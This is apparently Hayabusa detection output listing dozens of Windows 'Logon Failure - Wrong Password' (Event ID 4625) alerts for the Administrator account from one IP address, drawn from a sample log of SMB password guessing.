2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VaqXgO2US87zoXLl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QHEfAfFuAR2pX3LO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4Owk2elGaC5DOm1U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VXPynWzVNADN56a4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xwfwZ0hXFaFwqymH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QYlZwLsvrsuqUZ4q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pvGrzr30eVl5TGhA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tqdJcHWbdGcIIHBr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YDt69bIJ1yI6PXLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WtE2uMuOe8QPAKOj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BWQDlZDgFj9NmMhJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ncQiyLyHCXr8knGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XjVmLfmcPMYbmdin  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gU2HjzjDxHsnvENI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cUPn5CEz2LtwRwvZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hCz069oBFXqpshbU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dzhc9PVRVP69tshD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ejA3ZNfKWEs8zAMX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U5egiL2PGOrYCHv5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YYhIM3zla6KcbKbM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WjyQJnVBO4iC9Tkw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g6Tpp8TRa2nRxHzo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DyLvo5Bn2HzyANdH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NaXNThuZDGqJ7oCP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 42Sb7p19cQsEV30b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: An6629wgflzSgqY5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iO7JktEihqddmEtv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nG97BFOgKxnZaqi4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SH2D24c6nRGDL4Oe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uiu2yfaM2JQQZoLF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YQx9PG8DtR2tMjvS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OoAWryajKhLD7RyY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PgewSeaVugP1TXss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sPMCPdCAnz4upz8X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dUbV6xnGeBWE8Dif  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dIJ9mZczFO1GKItV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wW0vxE4o68L70Sra  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: upOn9DzB1yWtntyX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m9uGgocAVReiJWDm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qm9Jf1fles2HOb3g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ev5eTWdf3CskOMuh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QoiMO6sSLOm4fOD5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xDjvMsa2IgR9KO7l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SR7gVjxHZDYeK7pJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4jzGAepr7JeNKuuk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H9baxEeRCWjx6Fzr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uy7aTt0B4ErguacA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nvKcLrUXqu2vTKO3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PLycXLeAU21pdnXL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SgwjJSKOPnurDWW4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YPDYdxPoQAl8aGMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CX8knunlT6SMpmQw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AAjYbt50leZt3Xve  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3CD0HUCdg4UWOiji  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dkeWmTE1R1rYaYP8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W87qcfSj4qWWUv4k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WUCyUQgbUqwaLj3J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q9nLhDbcvmVBZp4f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BBWo1zDdjaAeGDWW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vjHRFk2flmzzd1zg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 53HYxs9s7fpP1y6V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tluqXKvVooP7VNyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 43m0nfi5tiv4TpSB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qjPyJXl984vViV6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MomQ8Yt51VsMiO4p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LJYCi5r2otMHxA8f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4oUSkMBI8SGDLwYC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j1x3lyRjxn73KITB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gh05BhGpwq1ho62a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bxj6ITbiciyRNLbF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uev2mjCaqHjm6NYi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L4WU383o9E5JyM5V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lfMv0lsoiRnTCFXe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
